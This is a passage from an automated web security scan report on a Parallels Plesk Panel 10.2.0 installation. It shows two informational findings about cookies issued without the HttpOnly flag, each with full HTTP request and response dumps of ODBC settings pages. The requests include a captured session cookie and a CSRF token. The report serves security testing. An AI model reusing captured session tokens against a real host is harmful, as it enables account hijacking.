   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">

<fieldset>

   <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>
   
   <div class="screenButtons">
       <DIV class="commonButton" id="bid-odbc-dsn-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Add ODBC data source.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/dsn@new/properties/&#039;); return false;" style=""><BUTTON name="bname_odbc_dsn_add" id="buttonid-odbc-dsn-add" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/dsn@new/properties/&#039;); return false;">Add New ODBC DSN</BUTTON><SPAN id="spanid-odbc-dsn-add">Add New ODBC DSN</SPAN></DIV>
   </div>
   
</td></tr></table></fieldset>

</div>

<div class="listArea">

<fieldset>

<legend>ODBC DSN connections</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<div class="paging pagingTop noList">No ODBC DSN connections</div><div class="paging pagingBottom noList"></div><script>SetCookie("dsnlist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function DsnListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function DsnListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function DsnListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function DsnListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.DsnListSelectAll.checked;
                           DsnListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function DsnListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function DsnListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function DsnListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   DsnListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function DsnListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function DsnListSearchShow()
           {
               var sc = document.getElementById("DsnListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("DsnListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function DsnListSearchHide()
           {
               var sc = document.getElementById("DsnListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("DsnListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function DsnListRemove(f)
           {
               if (0 == DsnListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/odbc/";
               lsubmit(f);
               return false;
           }
       </script>

</td></tr></table></fieldset>

</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.32. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@1/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/odbc/dsn@1/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:09:15 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:09:15 GMT
Connection: close
Content-Length: 17771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Set Up an ODBC Connection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_connection_config_mssql/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
var required = new Array('DRIVER', 'SERVER', 'UID', 'PWD');

function chk_fields(f) {

   // scan form for input fields
   for (i=0; i<f.elements.length; i++) {

       if ((f.elements[i].type == 'text' || f.elements[i].type == 'password') && f.elements[i].value == '') {

           // find if this variable is required or not
           req = false;
           for (j=0; j<required.length; j++) {
               if (f.elements[i].name == required[j]) {
                   req = 1;
                   break;
               }
           }

           if (req) {

               // required elements should be set
               alert("Required parameters are not supplied.");
               f.elements[i].focus();
               f.elements[i].select();
               return false;

           } else {

               // don't submit empty not required variables
               f.elements[i].disabled = true;
           }
       }
   }
   return true;
}

function check_data(f) { if (chk_fields(f)) { f.cmd.value = 'check'; lsubmit(f); } }
function update_data(f) { if (chk_fields(f)) { f.cmd.value = 'update'; lsubmit(f); } }
function test_connection(f) { if (chk_fields(f)) { f.cmd.value = 'test'; lsubmit(f); } }
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">


<tr>
   <td class="name">[DRIVER] &nbsp;Driver</td>
   <td>SQL Server<input type="hidden" name="DRIVER" value="SQL Server"></td>
</tr>

<tr>
   <td class="name">[SERVER] &nbsp;<span class="required">*</span>&nbsp;Server</td>
   <td><input type="text" name="SERVER" value="(local)" ></td>
</tr>

<tr>
   <td class="name">[UID] &nbsp;<span class="required">*</span>&nbsp;Login ID</td>
   <td><input type="text" name="UID" value="" ></td>
</tr>

<tr>
   <td class="name">[PWD] &nbsp;<span class="required">*</span>&nbsp;Password</td>
   <td><input type="password" name="PWD" value="" ></td>
</tr>

<tr>
   <td class="name">[DATABASE] &nbsp;&nbsp;Default database for the ODBC data source</td>
   <td><input type="text" name="DATABASE" value="" ></td>
</tr>

<tr>
   <td class="name">[APP] &nbsp;&nbsp;Application name</td>
   <td><input type="text" name="APP" value="" ></td>
</tr>

<tr>
   <td class="name">[WSID] &nbsp;&nbsp;Workstation ID</td>
   <td><input type="text" name="WSID" value="" ></td>
</tr>

<tr>
   <td class="name">[LANGUAGE] &nbsp;&nbsp;Default national language to use</td>
   <td><select name="LANGUAGE" id="fid-LANGUAGE" >    <option value='' SELECTED></option>
   <option value='Arabic'>Arabic</option>
   <option value='Brazilian'>Brazilian</option>
   <option value='British English'>British English</option>
   <option value='Bulgarian'>Bulgarian</option>
   <option value='Croatian'>Croatian</option>
   <option value='Czech'>Czech</option>
   <option value='Danish'>Danish</option>
   <option value='Dansk'>Dansk</option>
   <option value='Deutsch'>Deutsch</option>
   <option value='Dutch'>Dutch</option>
   <option value='English'>English</option>
   <option value='Estonian'>Estonian</option>
   <option value='Finnish'>Finnish</option>
   <option value='French'>French</option>
   <option value='German'>German</option>
   <option value='Greek'>Greek</option>
   <option value='Hungarian'>Hungarian</option>
   <option value='Italian'>Italian</option>
   <option value='Japanese'>Japanese</option>
   <option value='Korean'>Korean</option>
   <option value='Latvian'>Latvian</option>
   <option value='Lithuanian'>Lithuanian</option>
   <option value='Magyar'>Magyar</option>
   <option value='Nederlands'>Nederlands</option>
   <option value='Norwegian'>Norwegian</option>
   <option value='Polish'>Polish</option>
   <option value='Portuguese'>Portuguese</option>
   <option value='Romanian'>Romanian</option>
   <option value='Russian'>Russian</option>
   <option value='Simplified Chinese'>Simplified Chinese</option>
   <option value='Slovak'>Slovak</option>
   <option value='Slovenian'>Slovenian</option>
   <option value='Spanish'>Spanish</option>
   <option value='Suomi'>Suomi</option>
   <option value='Svenska'>Svenska</option>
   <option value='Swedish'>Swedish</option>
   <option value='Thai'>Thai</option>
   <option value='Traditional Chinese'>Traditional Chinese</option>
   <option value='Turkish'>Turkish</option>
   <option value='Us_english'>Us_english</option>
</select>
</td>
</tr>

<tr>
   <td class="name">[OEMTOANSI] &nbsp;&nbsp;Conversion of extended characters to OEM values</td>
   <td><select name="OEMTOANSI" id="fid-OEMTOANSI" >    <option value='' SELECTED></option>
   <option value='437 code page'>437 code page</option>
   <option value='850 code page'>850 code page</option>
   <option value='ISO 8859-1'>ISO 8859-1</option>
</select>
</td>
</tr>














</table>



</td></tr></table></fieldset>

   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-next" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Check the currently defined settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);check_data(document.forms[0]);;return false;" style=""><BUTTON name="bname_next" id="buttonid-next" type="button" onClick="Event.stop(event);check_data(document.forms[0]);;return false;">Next &gt;&gt;</BUTTON><SPAN id="spanid-next">Next &gt;&gt;</SPAN></DIV>&nbsp;<SPAN class="commonButton" id="bid-finish-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This feature is currently unavailable.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_finish" disabled id="buttonid-finish-disabled" type="button">Finish</BUTTON><SPAN id="spanid-finish-disabled">Finish</SPAN></SPAN>&nbsp;<DIV class="commonButton" id="bid-test" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Try to connect to the data source with current parameters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;" style=""><BUTTON name="bname_test" id="buttonid-test" type="button" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;">Test Connection</BUTTON><SPAN id="spanid-test">Test Connection</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.33. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@new/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/odbc/dsn@new/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:08:38 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:08:38 GMT
Connection: close
Content-Length: 13904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
